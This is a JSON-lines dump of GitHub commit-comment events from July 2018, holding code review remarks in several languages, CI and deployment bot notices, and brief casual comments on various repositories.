{"id":"8007062821","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"drag1313/Cash"},"payload":{"comment":{"id":29807417,"position":59,"line":59,"path":"src/Cash/Main.java","commit_id":"c446f061c32cd1dd79d75b2610954a3e72155270","created_at":"2018-07-24T00:03:51Z","updated_at":"2018-07-24T00:03:51Z","author_association":"COLLABORATOR","body":"x++? Зачем?"}},"created_at":"2018-07-24T00:03:51Z"}
{"id":"8007064501","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"drag1313/Cash"},"payload":{"comment":{"id":29807420,"position":41,"line":41,"path":"src/Cash/Users.java","commit_id":"c446f061c32cd1dd79d75b2610954a3e72155270","created_at":"2018-07-24T00:04:30Z","updated_at":"2018-07-24T00:04:30Z","author_association":"COLLABORATOR","body":"Так походу потеряли часть кода"}},"created_at":"2018-07-24T00:04:30Z"}
{"id":"8007068068","type":"CommitCommentEvent","actor":{"login":"Skillux"},"repo":{"name":"Skillux/WeatherLockX"},"payload":{"comment":{"id":29807428,"position":null,"line":null,"path":null,"commit_id":"ad169ff0655737a1e345ddf3eda8559d49918dbe","created_at":"2018-07-24T00:05:49Z","updated_at":"2018-07-24T00:05:49Z","author_association":"OWNER","body":"First commit"}},"created_at":"2018-07-24T00:05:49Z"}
{"id":"8007070226","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29807431,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-24T00:06:37Z","updated_at":"2018-07-24T00:06:37Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-24T00:06:37Z"}
{"id":"8007070612","type":"CommitCommentEvent","actor":{"login":"Qwayke"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29807432,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T00:06:47Z","updated_at":"2018-07-24T00:06:47Z","author_association":"NONE","body":"excelent "}},"created_at":"2018-07-24T00:06:47Z"}
{"id":"8007073071","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29807435,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-24T00:07:40Z","updated_at":"2018-07-24T00:07:40Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-24T00:07:40Z"}
{"id":"8007077130","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29807446,"position":null,"line":null,"path":null,"commit_id":"e4bf057cdecdf5bf47ce3c3f395e25693465eac0","created_at":"2018-07-24T00:09:15Z","updated_at":"2018-07-24T00:09:15Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-271](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-271).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-271-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-24T00:09:15Z"}
{"id":"8007077725","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29807448,"position":null,"line":null,"path":null,"commit_id":"c78cd7ed3707fc3050e8ea2c1a1024444769582a","created_at":"2018-07-24T00:09:30Z","updated_at":"2018-07-24T00:09:30Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-devfix](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-devfix).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-devfix-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-24T00:09:30Z"}
{"id":"8007079690","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29807455,"position":null,"line":null,"path":null,"commit_id":"ceec800d770d0cb5e7ca3057d3fa03c7c950e114","created_at":"2018-07-24T00:10:14Z","updated_at":"2018-07-24T00:10:14Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-902](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-902).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-902-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-24T00:10:14Z"}
{"id":"8007088104","type":"CommitCommentEvent","actor":{"login":"proski"},"repo":{"name":"wbsoft/python-ly"},"payload":{"comment":{"id":29807468,"position":19,"line":780,"path":"ly/document.py","commit_id":"1839104566add5507d1bc6de11d7fb118c06119f","created_at":"2018-07-24T00:13:26Z","updated_at":"2018-07-24T00:13:26Z","author_association":"COLLABORATOR","body":"Could it be `in_line=True` for better readability?"}},"created_at":"2018-07-24T00:13:26Z"}
{"id":"8007088487","type":"CommitCommentEvent","actor":{"login":"lelandjobson"},"repo":{"name":"EmilPoulsen/Frixel"},"payload":{"comment":{"id":29807469,"position":null,"line":null,"path":null,"commit_id":"3235e1a458e0574785907692c2fc33738150b755","created_at":"2018-07-24T00:13:34Z","updated_at":"2018-07-24T00:13:34Z","author_association":"COLLABORATOR","body":"Closes #21 "}},"created_at":"2018-07-24T00:13:34Z"}
{"id":"8007091331","type":"CommitCommentEvent","actor":{"login":"ZaphodBeebblebrox"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29807472,"position":null,"line":null,"path":null,"commit_id":"7dae88f95101ab42035ac5c1453b20e4e168354c","created_at":"2018-07-24T00:14:39Z","updated_at":"2018-07-24T00:14:39Z","author_association":"MEMBER","body":"It does not, fixed in f383594."}},"created_at":"2018-07-24T00:14:39Z"}
{"id":"8007092613","type":"CommitCommentEvent","actor":{"login":"friuns2"},"repo":{"name":"LordNoteworthy/al-khaser"},"payload":{"comment":{"id":29807477,"position":null,"line":null,"path":null,"commit_id":"8a68f1731af1aa4fc364e0ad0851f11ff32f280d","created_at":"2018-07-24T00:15:09Z","updated_at":"2018-07-24T00:15:09Z","author_association":"NONE","body":"tried with cheat engine, didn't detect anything for me"}},"created_at":"2018-07-24T00:15:09Z"}
{"id":"8007093293","type":"CommitCommentEvent","actor":{"login":"pbgc"},"repo":{"name":"bbatsov/projectile"},"payload":{"comment":{"id":29807480,"position":null,"line":null,"path":null,"commit_id":"bc5a96cefb7a76361df17a0b8262152bfde220b5","created_at":"2018-07-24T00:15:25Z","updated_at":"2018-07-24T00:15:25Z","author_association":"NONE","body":"@bbatsov c-c c-p is used by elpy ... and it's bound to elpy-flymake-previous-error ....\r\nThis change really got my fingers confused ..."}},"created_at":"2018-07-24T00:15:25Z"}
{"id":"8007096252","type":"CommitCommentEvent","actor":{"login":"proski"},"repo":{"name":"wbsoft/python-ly"},"payload":{"comment":{"id":29807490,"position":9,"line":771,"path":"ly/document.py","commit_id":"1839104566add5507d1bc6de11d7fb118c06119f","created_at":"2018-07-24T00:16:29Z","updated_at":"2018-07-24T00:16:29Z","author_association":"COLLABORATOR","body":"How about aligning the argument name with the comment? The comment doesn't mention lines. Could `in_line` be `current_block` or `global` (with inversion of the logic)?"}},"created_at":"2018-07-24T00:16:29Z"}
{"id":"8007103521","type":"CommitCommentEvent","actor":{"login":"Maxwell2022"},"repo":{"name":"cereallarceny/cra-ssr"},"payload":{"comment":{"id":29807506,"position":35,"line":35,"path":"package.json","commit_id":"cfc8d8f6fba59fbdc475d5622d52ad0dc9a50a07","created_at":"2018-07-24T00:19:13Z","updated_at":"2018-07-24T00:19:13Z","author_association":"NONE","body":"you can use `pretty-quick` which save you lint-stage configuration:\r\n\r\n```\r\n\"scripts\": {\r\n  \"precommit\": \"pretty-quick --staged\"\r\n}, \r\n\"devDependincies\": {\r\n  \"eslint-config-prettier\": \"^2.9.0\",\r\n  \"eslint-plugin-prettier\": \"^2.6.2\",\r\n  \"husky\": \"^0.14.3\",\r\n  \"prettier\": \"^1.13.7\",\r\n  \"pretty-quick\": \"^1.6.0\"\r\n},\r\n\"prettier\":{\r\n  \"semi\": true,\r\n  \"useTabs\": false,\r\n  \"singleQuote\": true,\r\n  \"trailingComma\": \"es5\",\r\n  \"arrowParens\": \"avoid\"\r\n}\r\n```"}},"created_at":"2018-07-24T00:19:13Z"}
{"id":"8007104468","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29807508,"position":null,"line":null,"path":null,"commit_id":"cb518f6c517d6cb8b8f8a6e1b3b80f4e963fc0b0","created_at":"2018-07-24T00:19:35Z","updated_at":"2018-07-24T00:19:35Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-24T00:19:35Z"}
{"id":"8007105068","type":"CommitCommentEvent","actor":{"login":"proski"},"repo":{"name":"wbsoft/python-ly"},"payload":{"comment":{"id":29807510,"position":null,"line":null,"path":null,"commit_id":"1839104566add5507d1bc6de11d7fb118c06119f","created_at":"2018-07-24T00:19:50Z","updated_at":"2018-07-24T00:19:50Z","author_association":"COLLABORATOR","body":"Looks good to me"}},"created_at":"2018-07-24T00:19:50Z"}
{"id":"8007105289","type":"CommitCommentEvent","actor":{"login":"Maxwell2022"},"repo":{"name":"cereallarceny/cra-ssr"},"payload":{"comment":{"id":29807511,"position":35,"line":35,"path":"package.json","commit_id":"cfc8d8f6fba59fbdc475d5622d52ad0dc9a50a07","created_at":"2018-07-24T00:19:55Z","updated_at":"2018-07-24T00:19:55Z","author_association":"NONE","body":"and in you .eslintrc you just have:\r\n\r\n```\r\n{\r\n  \"extends\": [\"react-app\", \"plugin:prettier/recommended\"]\r\n}\r\n```"}},"created_at":"2018-07-24T00:19:55Z"}
{"id":"8007105957","type":"CommitCommentEvent","actor":{"login":"274188A"},"repo":{"name":"fbprogmbh/Audit-Test-Automation"},"payload":{"comment":{"id":29807514,"position":null,"line":null,"path":null,"commit_id":"aeb326640a99f6c68b175e9aff3daf0818e9e916","created_at":"2018-07-24T00:20:09Z","updated_at":"2018-07-24T00:20:09Z","author_association":"NONE","body":"you are correct - my mistake"}},"created_at":"2018-07-24T00:20:09Z"}
{"id":"8007111167","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29807525,"position":null,"line":null,"path":null,"commit_id":"a727a64ed9c6df438110ec9d2b69552bc91e899d","created_at":"2018-07-24T00:22:08Z","updated_at":"2018-07-24T00:22:08Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-992](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-992).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-992-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-24T00:22:08Z"}
{"id":"8007130103","type":"CommitCommentEvent","actor":{"login":"tyetech"},"repo":{"name":"tyetech/hpe-application-automation-tools-plugin"},"payload":{"comment":{"id":29807584,"position":null,"line":null,"path":null,"commit_id":"9bc13d65401e27f9bf8999253ccd830634cd1bc6","created_at":"2018-07-24T00:29:34Z","updated_at":"2018-07-24T00:29:34Z","author_association":"OWNER","body":"\r\n\r\n[adxregistrator.log](https://github.com/tyetech/hpe-application-automation-tools-plugin/files/2221516/adxregistrator.log)\r\n"}},"created_at":"2018-07-24T00:29:34Z"}
{"id":"8007134178","type":"CommitCommentEvent","actor":{"login":"adamgarza"},"repo":{"name":"adamgarza/opencensus-java"},"payload":{"comment":{"id":29807593,"position":6,"line":19,"path":"contrib/zpages/build.gradle","commit_id":"48f9df44957794e14680e7587d4865279b521251","created_at":"2018-07-24T00:31:13Z","updated_at":"2018-07-24T00:31:13Z","author_association":"OWNER","body":"@songy23 - Using the `user.dir` property, I inserted `out.write(System.getProperty(\"user.dir\"))` into RpczPageHandler.java, I realized the current director was actually 'examples'.\r\nCorrect path to resource style.css after Gradle build is:\r\n```java\r\nprivate static final String CSS_PATH =\r\n        \"../contrib/zpages/build/resources/main/style.css\";\r\n``` "}},"created_at":"2018-07-24T00:31:13Z"}
{"id":"8007144527","type":"CommitCommentEvent","actor":{"login":"lincolwn"},"repo":{"name":"levymtmr/work-at-olist"},"payload":{"comment":{"id":29807601,"position":null,"line":null,"path":null,"commit_id":"c6ba211754e4c4e4341e4d643650aaf4a9637693","created_at":"2018-07-24T00:35:17Z","updated_at":"2018-07-24T00:35:17Z","author_association":"NONE","body":"O campo `call_id` da classe `CallStartRecord` deveria ser `AutoField` ao invés de `IntegerField`."}},"created_at":"2018-07-24T00:35:17Z"}
{"id":"8007145766","type":"CommitCommentEvent","actor":{"login":"SolACruz"},"repo":{"name":"droid-squad/Natville"},"payload":{"comment":{"id":29807602,"position":null,"line":null,"path":null,"commit_id":"21c78f587f57faa67c594036ea8d1b3f9d9d9649","created_at":"2018-07-24T00:35:48Z","updated_at":"2018-07-24T00:35:48Z","author_association":"CONTRIBUTOR","body":"![screen shot 2018-07-23 at 5 27 48 pm](https://user-images.githubusercontent.com/29127877/43110065-d15eef8c-8e9e-11e8-9ac1-964047f854fd.png)\r\n"}},"created_at":"2018-07-24T00:35:48Z"}
{"id":"8007146220","type":"CommitCommentEvent","actor":{"login":"gsatimos"},"repo":{"name":"aodn/aodn-portal"},"payload":{"comment":{"id":29807604,"position":133,"line":194,"path":"web-app/js/portal/ui/openlayers/control/SpatialConstraint.js","commit_id":"752fd89a74f7925279f10b4a2d4478ae4023be1e","created_at":"2018-07-24T00:35:59Z","updated_at":"2018-07-24T00:35:59Z","author_association":"CONTRIBUTOR","body":"@jonescc in most cases, `this.handler.div` is `undefined` and I'm not sure what the purpose might have been to start doing this check here. Can we look at this together when you have a sec?"}},"created_at":"2018-07-24T00:35:59Z"}
{"id":"8007147415","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29807606,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-24T00:36:27Z","updated_at":"2018-07-24T00:36:27Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-24T00:36:27Z"}
{"id":"8007148979","type":"CommitCommentEvent","actor":{"login":"sabhiram"},"repo":{"name":"20tab/UnrealEnginePython"},"payload":{"comment":{"id":29807608,"position":null,"line":null,"path":null,"commit_id":"c72703dee2f1f60cfae15388388be4575b3d1630","created_at":"2018-07-24T00:37:03Z","updated_at":"2018-07-24T00:37:03Z","author_association":"CONTRIBUTOR","body":"Why on earth did you change this order from the UE4 FRotator ordering of `pitch, yaw, roll`?"}},"created_at":"2018-07-24T00:37:03Z"}
{"id":"8007152576","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29807613,"position":null,"line":null,"path":null,"commit_id":"832c04c5b5f83ba77d1077bcef1cfc2241f2ed39","created_at":"2018-07-24T00:38:28Z","updated_at":"2018-07-24T00:38:28Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2981 of 2984 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 3 tests had: EIO diffs.\n * 3 tests had: ESO big diffs.\n * 3 tests had: MTR big diffs.\n * 3 tests had: Table big diffs.\n * 1 test had: ERR diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 640\n * Failed: 3\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-832c04c5b5f83ba77d1077bcef1cfc2241f2ed39-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-832c04c5b5f83ba77d1077bcef1cfc2241f2ed39-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.9%25-yellow.png)</a> \n"}},"created_at":"2018-07-24T00:38:28Z"}
{"id":"8007158166","type":"CommitCommentEvent","actor":{"login":"lincolwn"},"repo":{"name":"levymtmr/work-at-olist"},"payload":{"comment":{"id":29807620,"position":null,"line":null,"path":null,"commit_id":"ab098c6fc3bf089464b6bbc34a1b5ab7dd7706ba","created_at":"2018-07-24T00:40:43Z","updated_at":"2018-07-24T00:40:43Z","author_association":"NONE","body":"Eu trocaria `fields` abaixo:\r\nhttps://github.com/levymtmr/work-at-olist/blob/c6ba211754e4c4e4341e4d643650aaf4a9637693/calls/serializers.py#L5-L9\r\n\r\npor:\r\n```python\r\nfields = ('__all__')\r\n```"}},"created_at":"2018-07-24T00:40:43Z"}
{"id":"8007158675","type":"CommitCommentEvent","actor":{"login":"ThaTiemsz"},"repo":{"name":"DJScias/Discord-Datamining"},"payload":{"comment":{"id":29807621,"position":null,"line":null,"path":null,"commit_id":"02d7869506e0ddfd2353963626e11d977d268838","created_at":"2018-07-24T00:40:56Z","updated_at":"2018-07-24T00:40:56Z","author_association":"COLLABORATOR","body":"- New analytic events: `overlay_locked`, `overlay_unlocked`"}},"created_at":"2018-07-24T00:40:56Z"}
{"id":"8007160319","type":"CommitCommentEvent","actor":{"login":"arey0pushpa"},"repo":{"name":"arey0pushpa/dcnf-autarky"},"payload":{"comment":{"id":29807625,"position":null,"line":null,"path":null,"commit_id":"c50dfd8b71ca9ee42e9055f4f3896d9f6755d74c","created_at":"2018-07-24T00:41:38Z","updated_at":"2018-07-24T00:41:38Z","author_association":"OWNER","body":"Thanks. Will put this in mind in future."}},"created_at":"2018-07-24T00:41:38Z"}
{"id":"8007163955","type":"CommitCommentEvent","actor":{"login":"Croydon"},"repo":{"name":"inexorgame/audioaugust"},"payload":{"comment":{"id":29807642,"position":null,"line":null,"path":null,"commit_id":"4f1022ec8d0704dd96a8933cf46424f2365af0ac","created_at":"2018-07-24T00:43:05Z","updated_at":"2018-07-24T00:43:05Z","author_association":"MEMBER","body":"What tag information did you remove?"}},"created_at":"2018-07-24T00:43:05Z"}
{"id":"8007164894","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29807644,"position":null,"line":null,"path":null,"commit_id":"832c04c5b5f83ba77d1077bcef1cfc2241f2ed39","created_at":"2018-07-24T00:43:28Z","updated_at":"2018-07-24T00:43:28Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (rraustad) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-832c04c5b5f83ba77d1077bcef1cfc2241f2ed39-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-24T00:43:28Z"}
{"id":"8007166567","type":"CommitCommentEvent","actor":{"login":"julesghub"},"repo":{"name":"underworldcode/underworld2"},"payload":{"comment":{"id":29807651,"position":null,"line":null,"path":null,"commit_id":"1b9e34d01a094eeb648a9eab6c2586a3616dff10","created_at":"2018-07-24T00:44:08Z","updated_at":"2018-07-24T00:44:08Z","author_association":"CONTRIBUTOR","body":"Jenkins is happy again! Nice one. I'll update Jenkins later this week."}},"created_at":"2018-07-24T00:44:08Z"}
{"id":"8007167801","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29807655,"position":null,"line":null,"path":null,"commit_id":"0da290b1346736c5ba10835188dc2fa4e047ac28","created_at":"2018-07-24T00:44:38Z","updated_at":"2018-07-24T00:44:38Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-353](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-353).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-353-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-24T00:44:38Z"}
{"id":"8007171304","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29807670,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-24T00:45:56Z","updated_at":"2018-07-24T00:45:56Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-24T00:45:56Z"}
{"id":"8007180832","type":"CommitCommentEvent","actor":{"login":"baby2013"},"repo":{"name":"baby2013/testgit"},"payload":{"comment":{"id":29807689,"position":8,"line":17,"path":"README.md","commit_id":"48455d5e5dfd2f4e5bfefc30c71fd1676884b91f","created_at":"2018-07-24T00:49:52Z","updated_at":"2018-07-24T00:49:52Z","author_association":"OWNER","body":"helloworld"}},"created_at":"2018-07-24T00:49:52Z"}
{"id":"8007182091","type":"CommitCommentEvent","actor":{"login":"baby2013"},"repo":{"name":"baby2013/testgit"},"payload":{"comment":{"id":29807692,"position":null,"line":null,"path":null,"commit_id":"48455d5e5dfd2f4e5bfefc30c71fd1676884b91f","created_at":"2018-07-24T00:50:20Z","updated_at":"2018-07-24T00:50:20Z","author_association":"OWNER","body":"ffffff"}},"created_at":"2018-07-24T00:50:20Z"}
{"id":"8007182486","type":"CommitCommentEvent","actor":{"login":"Darkened5ky"},"repo":{"name":"Darkened5ky/Wind-Waker-Item-and-Map-Tracker"},"payload":{"comment":{"id":29807693,"position":null,"line":null,"path":null,"commit_id":"6d12495f8cd0100bfbbe000048a2cc7abf5d9a9c","created_at":"2018-07-24T00:50:31Z","updated_at":"2018-07-24T00:50:31Z","author_association":"OWNER","body":"STUPID github desktop, only committing three lines of what needed to be committed. Luckily it finally worked on the next commit."}},"created_at":"2018-07-24T00:50:31Z"}
{"id":"8007185159","type":"CommitCommentEvent","actor":{"login":"TranDoQuocHuy"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29807697,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T00:51:35Z","updated_at":"2018-07-24T00:51:35Z","author_association":"NONE","body":"Nice"}},"created_at":"2018-07-24T00:51:35Z"}
{"id":"8007185557","type":"CommitCommentEvent","actor":{"login":"pingevt"},"repo":{"name":"bluecadet/riveralive-cms"},"payload":{"comment":{"id":29807698,"position":null,"line":null,"path":null,"commit_id":"ca62714a18ba68685d487f23613866646810eae2","created_at":"2018-07-24T00:51:45Z","updated_at":"2018-07-24T00:51:45Z","author_association":"MEMBER","body":"Created multidev environment [riveralive-cms#ci-195](https://dashboard.pantheon.io/sites/ced938b0-bbbf-4ed2-ba1c-98b66d8ba2be#ci-195).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-195-riveralive-cms.pantheonsite.io/)"}},"created_at":"2018-07-24T00:51:45Z"}
{"id":"8007191857","type":"CommitCommentEvent","actor":{"login":"QuantumStatement"},"repo":{"name":"MrCrayfish/MrCrayfishFurnitureMod"},"payload":{"comment":{"id":29807707,"position":35,"line":47,"path":"src/main/java/com/mrcrayfish/furniture/blocks/BlockDesk.java","commit_id":"378f8d83028549c6bed8ef83a6629fabe9e64a38","created_at":"2018-07-24T00:54:20Z","updated_at":"2018-07-24T00:54:20Z","author_association":"CONTRIBUTOR","body":"Fixed in #255"}},"created_at":"2018-07-24T00:54:20Z"}
{"id":"8007198691","type":"CommitCommentEvent","actor":{"login":"lobi07"},"repo":{"name":"xYokilyoksx/SimpleBlogMVC"},"payload":{"comment":{"id":29807720,"position":null,"line":null,"path":null,"commit_id":"727b31f84d6c4961830604596e0b2fd0e928baad","created_at":"2018-07-24T00:57:01Z","updated_at":"2018-07-24T00:57:01Z","author_association":"NONE","body":"vive les tacos"}},"created_at":"2018-07-24T00:57:01Z"}
{"id":"8007202814","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-sawa/meikai_cpp_sawa"},"payload":{"comment":{"id":29807729,"position":3,"line":18,"path":"5-13.cpp","commit_id":"d9d209dc2f37e9d77b969fe26ebdf700d3590f9e","created_at":"2018-07-24T00:58:38Z","updated_at":"2018-07-24T00:58:38Z","author_association":"COLLABORATOR","body":"例のごとく要素数を定数でお願いします。"}},"created_at":"2018-07-24T00:58:38Z"}
{"id":"8007204139","type":"CommitCommentEvent","actor":{"login":"lobi07"},"repo":{"name":"maelgiese/SimpleBlogMVC"},"payload":{"comment":{"id":29807737,"position":null,"line":null,"path":null,"commit_id":"9d1579073bfc4260bb86567a47028522e17c2a90","created_at":"2018-07-24T00:59:11Z","updated_at":"2018-07-24T00:59:11Z","author_association":"NONE","body":"b3outoi"}},"created_at":"2018-07-24T00:59:11Z"}
{"id":"8007217922","type":"CommitCommentEvent","actor":{"login":"victor27111"},"repo":{"name":"victor27111/Mestre-Supremo"},"payload":{"comment":{"id":29807778,"position":null,"line":null,"path":null,"commit_id":"b60de428504003979d082345fd894aeb47b6783f","created_at":"2018-07-24T01:04:21Z","updated_at":"2018-07-24T01:04:21Z","author_association":"OWNER","body":"cool"}},"created_at":"2018-07-24T01:04:21Z"}
{"id":"8007218804","type":"CommitCommentEvent","actor":{"login":"lincolwn"},"repo":{"name":"levymtmr/work-at-olist"},"payload":{"comment":{"id":29807779,"position":null,"line":null,"path":null,"commit_id":"ab098c6fc3bf089464b6bbc34a1b5ab7dd7706ba","created_at":"2018-07-24T01:04:41Z","updated_at":"2018-07-24T01:04:41Z","author_association":"NONE","body":"Esta classe abaixo:\r\nhttps://github.com/levymtmr/work-at-olist/blob/c6ba211754e4c4e4341e4d643650aaf4a9637693/calls/serializers.py#L19-L23\r\n\r\nFaria assim:\r\n```python\r\nclass CallSerializer(serializers.Serializer):\r\n    call_id = serializers.IntegerField()\r\n    duration = serializers.DurationField(read_only=True)\r\n    source = serializers.CharField(max_length=11)\r\n    destination = serializers.CharField(max_length=11)\r\n\r\n```"}},"created_at":"2018-07-24T01:04:41Z"}
{"id":"8007219522","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29807783,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-24T01:04:57Z","updated_at":"2018-07-24T01:04:57Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-24T01:04:57Z"}
{"id":"8007220676","type":"CommitCommentEvent","actor":{"login":"egucciar"},"repo":{"name":"semantic-release/semantic-release"},"payload":{"comment":{"id":29807787,"position":126,"line":126,"path":"index.js","commit_id":"b4440fe0d38ceb972bdda9ccb24aafb78e8b3cef","created_at":"2018-07-24T01:05:23Z","updated_at":"2018-07-24T01:05:23Z","author_association":"NONE","body":"Ran into this same issue, definitely wouldn't mind getting a tad more familiar with this repository and pitching in with this issue.\r\n\r\nLet me know if there's any ideas on how i can assist, @pvdlg and @domwashburn \r\n\r\nMy \"branches\" looks just like yours, except \"staging\" rather than \"development\".\r\n\r\n"}},"created_at":"2018-07-24T01:05:23Z"}
{"id":"8007223503","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29807793,"position":null,"line":null,"path":null,"commit_id":"343c977bd20c2005116ae2b1b6186d682c1e939c","created_at":"2018-07-24T01:06:29Z","updated_at":"2018-07-24T01:06:29Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-devfix](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-devfix).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-devfix-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-24T01:06:29Z"}
